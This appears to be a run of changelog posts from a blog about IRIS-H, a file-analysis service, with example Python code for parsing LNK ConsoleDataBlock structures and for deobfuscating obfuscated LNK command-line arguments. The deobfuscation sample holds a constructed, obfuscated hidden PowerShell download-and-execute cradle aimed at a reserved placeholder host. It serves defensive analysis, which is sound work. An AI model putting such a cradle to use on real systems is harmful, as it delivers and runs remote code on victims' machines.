<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">: None</span><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;" /><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">IRIS-H </span><span style="background-color: white; color: #666666; font-family: "open sans", "helvetica neue", helvetica, arial, sans-serif; font-size: 14px;">Shell Link (.</span><span style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">LNK) file parser has been updated to include data extraction routine for </span><span style="color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">"Console Data Block" <a href="https://msdn.microsoft.com/en-us/library/dd891381.aspx" rel="nofollow" target="_blank">structures</a>. 
</span><span style="color: #2a2a2a; font-family: "Segoe UI", "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 13px;">The ConsoleDataBlock structure specifies the display settings to use when a</span> link target<span style="color: #2a2a2a; font-family: "Segoe UI", "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 13px;"> specifies an application that is run in a console window. Below are just some examples of data stored in these structures:</span><br />
<br />
<ul>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">foreground and background text colors in the console window.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">foreground and background text color in the console window popup.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">console window buffer size.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">console window size.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">console window origins coordinates.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">font information.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">cursor information.</span></span></li>
<li><span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">edit settings.</span></span></li>
</ul>
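<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">As an added illustration (this is example code written for this page, not IRIS-H code), the Python below walks a LNK ExtraData list, finds the ConsoleDataBlock by its signature 0xA0000002 and unpacks the fields listed above according to the layout in MS-SHLLINK section 2.5.1. The ExtraData bytes are constructed inside the script (a ConsoleFEDataBlock, then a ConsoleDataBlock, then the TerminalBlock) rather than taken from a real sample; the colour-bit names follow the standard Windows console attribute flags and FontSize is read as a COORD (width in the low word, height in the high word).</span></span></div>

```python
import struct

# ConsoleDataBlock layout, MS-SHLLINK 2.5.1: fixed 0xCC bytes, little-endian.
CONSOLE_DATA_BLOCK_SIGNATURE = 0xA0000002
CONSOLE_DATA_BLOCK_SIZE = 0xCC
CONSOLE_FE_DATA_BLOCK_SIGNATURE = 0xA0000004   # used only to build the constructed sample

_CONSOLE_FMT = '<IIHHhhhhhhIIIII64sIIIIIIII64s'
_CONSOLE_FIELDS = (
    'BlockSize', 'BlockSignature', 'FillAttributes', 'PopupFillAttributes',
    'ScreenBufferSizeX', 'ScreenBufferSizeY', 'WindowSizeX', 'WindowSizeY',
    'WindowOriginX', 'WindowOriginY', 'Unused1', 'Unused2',
    'FontSize', 'FontFamily', 'FontWeight', 'FaceName',
    'CursorSize', 'FullScreen', 'QuickEdit', 'InsertMode', 'AutoPosition',
    'HistoryBufferSize', 'NumberOfHistoryBuffers', 'HistoryNoDup', 'ColorTable',
)
assert struct.calcsize(_CONSOLE_FMT) == CONSOLE_DATA_BLOCK_SIZE

# Console text attributes: bits 0-3 foreground, bits 4-7 background (FOREGROUND_BLUE = 0x1 ...).
_COLOUR_BITS = ((0x1, 'blue'), (0x2, 'green'), (0x4, 'red'), (0x8, 'intensity'))


def decode_fill_attributes(attrs):
    """Split a console attribute word into named foreground and background flags."""
    return {'foreground': [name for bit, name in _COLOUR_BITS if attrs & bit],
            'background': [name for bit, name in _COLOUR_BITS if attrs & (bit << 4)]}


def parse_console_data_block(block):
    """Unpack one ConsoleDataBlock into a dict; raises ValueError on size/signature mismatch."""
    if len(block) < CONSOLE_DATA_BLOCK_SIZE:
        raise ValueError('ConsoleDataBlock truncated: %d bytes' % len(block))
    info = dict(zip(_CONSOLE_FIELDS, struct.unpack(_CONSOLE_FMT, block[:CONSOLE_DATA_BLOCK_SIZE])))
    if info['BlockSignature'] != CONSOLE_DATA_BLOCK_SIGNATURE or info['BlockSize'] != CONSOLE_DATA_BLOCK_SIZE:
        raise ValueError('not a well-formed ConsoleDataBlock')
    # FaceName is a fixed 64-byte UTF-16LE buffer; keep the text before the first NUL.
    info['FaceName'] = info['FaceName'].decode('utf-16-le', 'replace').split('\x00', 1)[0]
    # FontSize is a COORD: low word = width, high word = height, in pixels.
    info['FontWidth'], info['FontHeight'] = info['FontSize'] & 0xFFFF, info['FontSize'] >> 16
    # ColorTable is 16 COLORREF values (0x00BBGGRR), one per palette slot; report them as hex.
    info['ColorTable'] = ['%06X' % c for c in struct.unpack('<16I', info['ColorTable'])]
    info['FillAttributes'] = decode_fill_attributes(info['FillAttributes'])
    info['PopupFillAttributes'] = decode_fill_attributes(info['PopupFillAttributes'])
    return info


def iter_extra_data_blocks(extra):
    """Yield (signature, raw_block) for each block in an ExtraData list.

    Every block starts with a 4-byte BlockSize; a BlockSize below 4 is the TerminalBlock.
    A size that overruns the buffer is treated as corruption rather than silently skipped."""
    pos = 0
    while pos + 4 <= len(extra):
        size = struct.unpack_from('<I', extra, pos)[0]
        if size < 4:
            break
        if size < 8 or pos + size > len(extra):
            raise ValueError('malformed ExtraData block at offset %d' % pos)
        yield struct.unpack_from('<I', extra, pos + 4)[0], extra[pos:pos + size]
        pos += size


def find_console_data_block(extra):
    """Return the parsed ConsoleDataBlock from an ExtraData list, or None if absent."""
    for signature, raw in iter_extra_data_blocks(extra):
        if signature == CONSOLE_DATA_BLOCK_SIGNATURE:
            return parse_console_data_block(raw)
    return None


def build_sample_extra_data():
    """Constructed ExtraData (not from a real LNK): ConsoleFEDataBlock + ConsoleDataBlock + TerminalBlock."""
    fe_block = struct.pack('<III', 0x0C, CONSOLE_FE_DATA_BLOCK_SIGNATURE, 1252)
    palette = [0x000000, 0x800000, 0x008000, 0x808000, 0x000080, 0x800080, 0x008080, 0xC0C0C0,
               0x808080, 0xFF0000, 0x00FF00, 0xFFFF00, 0x0000FF, 0xFF00FF, 0x00FFFF, 0xFFFFFF]
    console = struct.pack(
        _CONSOLE_FMT, CONSOLE_DATA_BLOCK_SIZE, CONSOLE_DATA_BLOCK_SIGNATURE,
        0x0007, 0x00F5,                  # white-on-black text, popup attributes
        80, 300, 80, 25, 0, 0,           # buffer 80x300, window 80x25, origin 0,0
        0, 0,                            # Unused1, Unused2
        0x000C0000, 0x36, 400,           # FontSize (12 px high), FontFamily, FontWeight
        'Lucida Console'.encode('utf-16-le').ljust(64, b'\x00'),
        25, 0, 1, 1, 1,                  # CursorSize, FullScreen, QuickEdit, InsertMode, AutoPosition
        50, 4, 0,                        # HistoryBufferSize, NumberOfHistoryBuffers, HistoryNoDup
        struct.pack('<16I', *palette))
    return fe_block + console + struct.pack('<I', 0)


if __name__ == '__main__':
    for key, value in find_console_data_block(build_sample_extra_data()).items():
        print('%-24s %s' % (key, value))
```

<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">In practice the bytes passed to find_console_data_block() are those that follow the LNK StringData section. The ValueError paths matter: a known signature with the wrong BlockSize, or a BlockSize that runs past the end of the file, is exactly the kind of hand-crafted inconsistency a parser should report instead of guessing around.</span></span></div>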
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">The screenshot below shows an example of "Console Data Block" data extracted by IRIS-H.</span></span></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL_zfwzpeVYSZaLog3zMeo0ABzpFR9pI-nKVytajhKQh0cI6q28dM1-3vxlGHzIx6ExCN__2D70nAj4uZgOO2nrPuEkoPZMTLTa2CbF3KXqM9DoBj_MsS8zVL5GMYRjqbHJV9m7qd-ZjYe/s1600/console_parser_output.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="911" data-original-width="600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL_zfwzpeVYSZaLog3zMeo0ABzpFR9pI-nKVytajhKQh0cI6q28dM1-3vxlGHzIx6ExCN__2D70nAj4uZgOO2nrPuEkoPZMTLTa2CbF3KXqM9DoBj_MsS8zVL5GMYRjqbHJV9m7qd-ZjYe/s1600/console_parser_output.PNG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H report showing "Console Data Block" data</td></tr>
</tbody></table>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #2a2a2a; font-family: Segoe UI, Lucida Grande, Verdana, Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">The full report can be found here - <a href="https://iris-h.services/report/dffa7c38201c92b1037d908addb0295e" rel="nofollow" target="_blank">https://iris-h.services/report/dffa7c38201c92b1037d908addb0295e</a></span></span></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-60082989269110695952017-11-27T22:13:00.000+00:002017-11-27T22:14:00.314+00:00IRIS-H (alpha): Updated LNK file parser / Command line arguments deobfuscation added<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: feature update</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API & UI (clear browser cache for '</span><span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>iris-h.services</b></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">' to see the changes)</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: The LNK file parser has been updated: command line arguments string deobfuscation and URL extraction have been added, and the UI report page now displays the new data.</span><br />
<b style="background-color: white; color: #666666; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">The IRIS-H </span></span><span style="background-color: white; color: #666666; font-family: "open sans" , "helvetica neue" , "helvetica" , "arial" , sans-serif; font-size: 14px;">Shell Link (.</span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">LNK) file parser has been updated and now attempts to deobfuscate the command line arguments string. When a command line arguments string is present, the service attempts the following:</span><br />
<br />
<ul>
<li>detect environment variable assignments made with the '<b><span style="color: #3d85c6;">set</span></b>' command</li>
<li>detect environment variable references delimited by the ' <b><span style="color: #3d85c6;">! </span></b>' (delayed expansion) and ' <b><span style="color: #3d85c6;">% </span></b>' special characters</li>
<li>replace referenced environment variables with their assigned values</li>
<li>remove the escape characters ' <b><span style="color: #3d85c6;">^ </span></b>' (cmd.exe) and ' <b><span style="color: #3d85c6;">` </span></b>' (PowerShell)</li>
<li>detect and extract URL strings</li>
<li>detect string concatenation operations and perform them</li>
</ul>
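<div>
To make the steps above concrete, here is an added Python implementation of the same procedure. It is an example written for this page, not IRIS-H's code, and it goes slightly beyond the list by also resolving cmd.exe substring expansion (<b>%NAME:~start,len%</b> / <b>!NAME:~start,len!</b>), which routinely accompanies set-based obfuscation in LNK arguments. The sample arguments string is constructed for the demonstration (example.invalid is a reserved domain). Two simplifications are deliberate: immediate (%) and delayed (!) expansion are treated alike, and carets are only stripped outside double quotes, where cmd.exe treats them as escapes.</div>

```python
import re

# All patterns below are my own approximations of cmd.exe / PowerShell syntax, not IRIS-H code.
CMD_SWITCH_RE = re.compile(r'^(?:/[A-Za-z](?::[A-Za-z]+)?\s+)+', re.I)      # leading "/V:ON /C"
SET_RE = re.compile(r'^set\s+"?([A-Za-z_]\w*)=(.*?)"?\s*$', re.I | re.S)     # set NAME=value, set "NAME=value"
VAR_RE = re.compile(r'([%!])([A-Za-z_]\w*)(?::~(-?\d+)(?:,(-?\d+))?)?\1')    # %N%, !N!, %N:~start,len%
SQ_CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")                     # 'ab' + 'cd'
DQ_CONCAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')                     # "ab" + "cd"
URL_RE = re.compile(r'(?:https?|ftp)://[^\s\'"<>()]+', re.I)


def split_commands(line):
    """Split on '&' / '&&' outside double quotes; a caret outside quotes escapes the next character."""
    parts, buf, in_quotes, i = [], [], False, 0
    while i < len(line):
        c = line[i]
        if c == '^' and not in_quotes and i + 1 < len(line):
            buf.append(line[i + 1])          # keep the escaped character, drop the caret
            i += 2
            continue
        if c == '"':
            in_quotes = not in_quotes
        elif c == '&' and not in_quotes:
            parts.append(''.join(buf))
            buf = []
            if line[i + 1:i + 2] == '&':     # '&&' is a single separator
                i += 1
            i += 1
            continue
        buf.append(c)
        i += 1
    parts.append(''.join(buf))
    return [p.strip() for p in parts if p.strip()]


def _substring(value, start, length):
    """cmd.exe %VAR:~start,len% semantics: negative start counts from the end, negative len trims the end."""
    if start is None:
        return value
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:n + length]
    return value[start:start + length]


def expand_variables(text, env, max_rounds=10):
    """Replace %NAME% / !NAME! (with optional substring syntax) until nothing changes.
    Undefined names are left as-is, which is what cmd.exe does on the command line."""
    def repl(m):
        name = m.group(2).lower()
        if name not in env:
            return m.group(0)
        start = int(m.group(3)) if m.group(3) is not None else None
        length = int(m.group(4)) if m.group(4) is not None else None
        return _substring(env[name], start, length)
    for _ in range(max_rounds):
        new = VAR_RE.sub(repl, text)
        if new == text:
            break
        text = new
    return text


def concat_literals(text, max_rounds=50):
    """Fold PowerShell 'a'+'b' and "a"+"b" chains into a single literal."""
    for _ in range(max_rounds):
        new = DQ_CONCAT_RE.sub(r'"\1\2"', SQ_CONCAT_RE.sub(r"'\1\2'", text))
        if new == text:
            break
        text = new
    return text


def deobfuscate_lnk_arguments(args):
    """Resolve set-assignments, variable references, escapes and concatenations; extract URLs."""
    env, resolved = {}, []
    for index, command in enumerate(split_commands(args)):
        if index == 0:
            command = CMD_SWITCH_RE.sub('', command)
        m = SET_RE.match(command)
        if m:
            env[m.group(1).lower()] = expand_variables(m.group(2), env)   # values may use earlier vars
            continue
        command = expand_variables(command, env)
        # Backtick is PowerShell's escape character; dropping it undoes i`e`x-style splitting
        # (approximation: genuine escapes such as `n are destroyed as well).
        command = concat_literals(command.replace('`', ''))
        resolved.append(command)
    deobfuscated = ' && '.join(resolved)
    return {'command': deobfuscated, 'variables': env, 'urls': URL_RE.findall(deobfuscated)}


# Constructed LNK arguments field (not from a real sample; example.invalid is a reserved name).
SAMPLE_ARGS = ('/V:ON /C set p=xxpow^ershellzz&&set u=ht&&set v=tp://example.invalid/a.ps1'
               '&&!p:~2,-2! -nop -w hidden -c "iex((New-Object Net.WebClient)'
               '.DownloadString(\'!u!\'+\'!v!\'))"')

if __name__ == '__main__':
    for key, value in deobfuscate_lnk_arguments(SAMPLE_ARGS).items():
        print(key, '=>', value)
```

<div>
On the constructed input the assignments resolve to the variables dictionary, the final command becomes a plain powershell download cradle, and the URL list holds the single reconstructed http URL. Keeping the variables separate from the resolved command is useful in a report: the raw assignments show the obfuscation technique, while the resolved command is what actually executes.</div>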
<div>
<br /></div>
<div>
Below is a report example showing the new feature in action.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCnvImWMMe1w0NNKFsRnTf6edjTTjhepdDL1usOhyphenhyphenGNpfsFz9Cm_fqzhyzhRhN-M7jXMg8D1dqfJ4yTBXElWxTASbPFCGfRLnP97gHVu82CMK0XvlnuigvXYeVf6YbqSRzCyafldr84y0N/s1600/report_example1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="729" data-original-width="622" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCnvImWMMe1w0NNKFsRnTf6edjTTjhepdDL1usOhyphenhyphenGNpfsFz9Cm_fqzhyzhRhN-M7jXMg8D1dqfJ4yTBXElWxTASbPFCGfRLnP97gHVu82CMK0XvlnuigvXYeVf6YbqSRzCyafldr84y0N/s320/report_example1.PNG" width="273" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LNK file analysis results showing deobfuscated command line arguments string and extracted URL</td></tr>
</tbody></table>
<div>
Corresponding report - <a href="https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c" rel="nofollow" target="_blank">https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c</a></div>
<div>
<br /></div>
<div>
More examples can be found here:</div>
<div>
<a href="https://iris-h.services/report/166127261e36b959e48eece2c1b26185" rel="nofollow" target="_blank">https://iris-h.services/report/166127261e36b959e48eece2c1b26185</a></div>
<div>
<a href="https://iris-h.services/report/2de846108b26101e3554f5964c1a3576" rel="nofollow" target="_blank">https://iris-h.services/report/2de846108b26101e3554f5964c1a3576</a></div>
<div>
<br /></div>
<div>
<u><b>NOTE</b></u><br />
IRIS-H UI changes might require clearing your browser cache for the <b><span style="color: #3d85c6;">iris-h.services</span></b> website to take effect.<br />
</div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-26990353915764712702017-11-16T23:01:00.000+00:002017-11-16T23:03:29.960+00:00IRIS-H (alpha): Updated OOXML 'document' file parser<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: feature update</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: OOXML 'document' file parser has been updated to detect and extract "</span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">Drawing Object Non-Visual Properties</span></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">".</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>Example</b>: <a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" style="color: #ff9900;" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a></span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white; font-size: 13px;">"</span><span style="font-size: 13px;">Drawing Object Non-Visual Properties(docPr) element specifies non-visual object properties for the parent DrawingML object. These properties are </span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">specified as child elements of '</span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><b>docPr</b></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">' element.</span></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">" - </span><span style="background-color: white;"><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ECMA-376 Part 1 (section 20.4.2.5)</span></span></span><br />
<span style="background-color: white;"><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="background-color: white;"><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">The OOXML '<b>document</b>' file parser has been updated to extract </span></span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">non-visual object properties associated with inline drawing objects (pictures). The extracted data is displayed in the corresponding '<b>document</b>' panel under the '<b>Individual Components</b>' section of the report page. The following properties are considered:</span><br />
<br />
<ul>
<li><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><b>descr</b> - </span></span>Specifies alternative text for the current DrawingML object, for use by assistive technologies or applications which do not display the current object.</li>
<li><b>hidden </b>- Specifies whether this DrawingML object is displayed. When a DrawingML object is displayed within a document, that object can be hidden (i.e., present, but not visible).</li>
<li><b>name </b>- Specifies the name of the object. Typically, this is used to store the original file name of a picture object.</li>
<li><b>title </b>- Specifies the title (caption) of the current DrawingML object.</li>
</ul>
<br />
Some of the above properties might be omitted from the property set. IRIS-H will only extract and display properties present in the set. See below for an example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBrtYIppS219BOupoNR5WkvWZIfbeLiM-5rhso0qICc0Jbv5fHjGxDKpnIDAxb0dAaCnHVZJscliEMu-s7B4PBpKOzA0gt4FgHccR7m7FrEAJtIfqq1NF8AwpFFhemVwat_tIJWOjpgq/s1600/non-visual_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="224" data-original-width="623" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBrtYIppS219BOupoNR5WkvWZIfbeLiM-5rhso0qICc0Jbv5fHjGxDKpnIDAxb0dAaCnHVZJscliEMu-s7B4PBpKOzA0gt4FgHccR7m7FrEAJtIfqq1NF8AwpFFhemVwat_tIJWOjpgq/s320/non-visual_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'document' panel showing non-visual object properties extracted from inline drawing object</td></tr>
</tbody></table>
<br />
As seen in the screenshot above, these properties can carry artifacts (for example the original file name of an embedded picture) that are useful in a digital forensics investigation.<br />
<br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">Full report for the example above can be found here - </span><a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" style="background-color: white; color: #b87209; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 13px; text-decoration-line: none;" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a><br />
<br />Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-69926688165271661062017-11-16T22:22:00.000+00:002017-11-16T23:02:31.593+00:00IRIS-H (alpha): Added OOXML 'Footer Part' parser<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Parser for OOXML "Footer Part" has been added. The parser detects and extracts text content including special field characters.</span><br />
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><b>Example</b>: <a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a></span><br />
